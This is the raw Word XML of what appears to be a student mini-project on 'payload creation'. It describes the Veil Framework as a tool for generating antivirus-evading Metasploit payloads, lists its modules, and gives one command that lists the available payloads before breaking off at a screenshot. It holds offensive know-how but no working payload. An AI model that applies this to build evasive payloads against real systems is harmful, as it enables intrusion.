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14FEE2" w14:textId="6E196EB8" w:rsidR="00BC1BED" w:rsidRPr="003D14FC" w:rsidRDefault="00BC1BED" w:rsidP="003D14FC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>MINI PROJECT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20027D0F" w14:textId="77777777" w:rsidR="002971CC" w:rsidRPr="003D14FC" w:rsidRDefault="002971CC" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45830150" w14:textId="3011132F" w:rsidR="00BC1BED" w:rsidRPr="003D14FC" w:rsidRDefault="00BC1BED" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>PAYLOAD CREATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD63267" w14:textId="77777777" w:rsidR="00BC1BED" w:rsidRPr="003D14FC" w:rsidRDefault="00BC1BED" w:rsidP="00BC1BED">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14F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VEIL Framework </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D58792E" w14:textId="121CBCFA" w:rsidR="00BC1BED" w:rsidRPr="003D14FC" w:rsidRDefault="00CA0E06" w:rsidP="00BC1BED">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="30" w:after="150" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="30" w:right="30"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Veil Framework</w:t>
      </w:r>
      <w:r w:rsidR="008104C2" w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> means </w:t>
      </w:r>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>a threat Research. The Veil Framework is a collection of tools designed for use during offensive security testing. When the time calls for it, Mandiant's Red Team will use the Veil-Framework to help achieve their objective.</w:t>
      </w:r>
      <w:r w:rsidR="00E75C5F" w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions. It replaces the package veil-evasion</w:t>
      </w:r>
      <w:r w:rsidR="00BC1BED" w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">It currently consists of the following modules </w:t>
      </w:r>
      <w:r w:rsidR="008104C2" w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257E0A07" w14:textId="77777777" w:rsidR="008104C2" w:rsidRPr="003D14FC" w:rsidRDefault="008104C2" w:rsidP="00FD7A4C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="362D926F" w14:textId="738A8E32" w:rsidR="00BC1BED" w:rsidRPr="003D14FC" w:rsidRDefault="00FD7A4C" w:rsidP="00FD7A4C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">i] </w:t>
      </w:r>
      <w:r w:rsidR="00BC1BED" w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Veil-Evasion</w:t>
      </w:r>
      <w:r w:rsidR="00BC1BED" w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00BC1BED" w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">It is </w:t>
      </w:r>
      <w:r w:rsidR="00BC1BED" w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>a tool to generate antivirus-evading payloads using a variety of techniques and languages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D57730F" w14:textId="6FB3B5F9" w:rsidR="00BC1BED" w:rsidRPr="003D14FC" w:rsidRDefault="00FD7A4C" w:rsidP="00FD7A4C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">ii] </w:t>
      </w:r>
      <w:r w:rsidR="00BC1BED" w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Veil-Catapult</w:t>
      </w:r>
      <w:r w:rsidR="00BC1BED" w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> − </w:t>
      </w:r>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00BC1BED" w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> psexec-style payload delivery system that integrates Veil-Evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE5CBE8" w14:textId="5C109FDE" w:rsidR="00BC1BED" w:rsidRPr="003D14FC" w:rsidRDefault="00FD7A4C" w:rsidP="00FD7A4C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">iii] </w:t>
      </w:r>
      <w:r w:rsidR="00BC1BED" w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Veil-PowerView</w:t>
      </w:r>
      <w:r w:rsidR="00BC1BED" w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> − </w:t>
      </w:r>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00BC1BED" w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> powershell tool to gain network situational awareness on Windows domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CC6BBC" w14:textId="0453D81C" w:rsidR="00BC1BED" w:rsidRPr="003D14FC" w:rsidRDefault="00FD7A4C" w:rsidP="00FD7A4C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">iv] </w:t>
      </w:r>
      <w:r w:rsidR="00BC1BED" w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Veil-Pillage</w:t>
      </w:r>
      <w:r w:rsidR="00BC1BED" w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> − </w:t>
      </w:r>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00BC1BED" w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> modular post-exploitation framework that integrates Veil-Evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD2F5A2" w14:textId="77777777" w:rsidR="00BC1BED" w:rsidRPr="003D14FC" w:rsidRDefault="00BC1BED" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="130BEA8B" w14:textId="77777777" w:rsidR="003961F8" w:rsidRPr="003D14FC" w:rsidRDefault="003961F8" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47A09A74" w14:textId="77777777" w:rsidR="003961F8" w:rsidRPr="003D14FC" w:rsidRDefault="003961F8" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29612956" w14:textId="77777777" w:rsidR="003961F8" w:rsidRPr="003D14FC" w:rsidRDefault="003961F8" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12F4E91A" w14:textId="77777777" w:rsidR="003961F8" w:rsidRPr="003D14FC" w:rsidRDefault="003961F8" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EAD28B3" w14:textId="77777777" w:rsidR="003961F8" w:rsidRPr="003D14FC" w:rsidRDefault="003961F8" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="739E57BC" w14:textId="77777777" w:rsidR="003961F8" w:rsidRPr="003D14FC" w:rsidRDefault="003961F8" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="289B1452" w14:textId="77777777" w:rsidR="003961F8" w:rsidRDefault="003961F8" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24BFE855" w14:textId="77777777" w:rsidR="003D14FC" w:rsidRDefault="003D14FC" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D6B7005" w14:textId="77777777" w:rsidR="003D14FC" w:rsidRDefault="003D14FC" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FA67A65" w14:textId="77777777" w:rsidR="003D14FC" w:rsidRDefault="003D14FC" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F373A38" w14:textId="77777777" w:rsidR="003D14FC" w:rsidRPr="003D14FC" w:rsidRDefault="003D14FC" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A85A745" w14:textId="77777777" w:rsidR="003961F8" w:rsidRPr="003D14FC" w:rsidRDefault="003961F8" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17263BFE" w14:textId="075171C1" w:rsidR="00BC1BED" w:rsidRPr="003D14FC" w:rsidRDefault="00BC1BED" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>STEP 1</w:t>
      </w:r>
      <w:r w:rsidR="000176E1" w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> =</w:t>
      </w:r>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Firstly we have to list the payloads available in VEIL Framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E5C3C2" w14:textId="7215E98D" w:rsidR="003961F8" w:rsidRPr="003D14FC" w:rsidRDefault="00BC1BED" w:rsidP="00BC1BED">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14F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w:t>
      </w:r>
      <w:r w:rsidR="000176E1" w:rsidRPr="003D14F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D14F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176E1" w:rsidRPr="003D14F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D14F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./Veil.py --tool Evasion --list-payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74449D35" w14:textId="2FB3DBE9" w:rsidR="00BC1BED" w:rsidRPr="003D14FC" w:rsidRDefault="00C375FA" w:rsidP="00BC1BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D14FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A1553D9" wp14:editId="1244A819">
            <wp:extent cx="5537200" cy="3376246"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="34421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19354" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId7"/>
                    <a:srcRect l="10470" t="12915" r="37500" b="9592"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5542506" cy="3379482"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
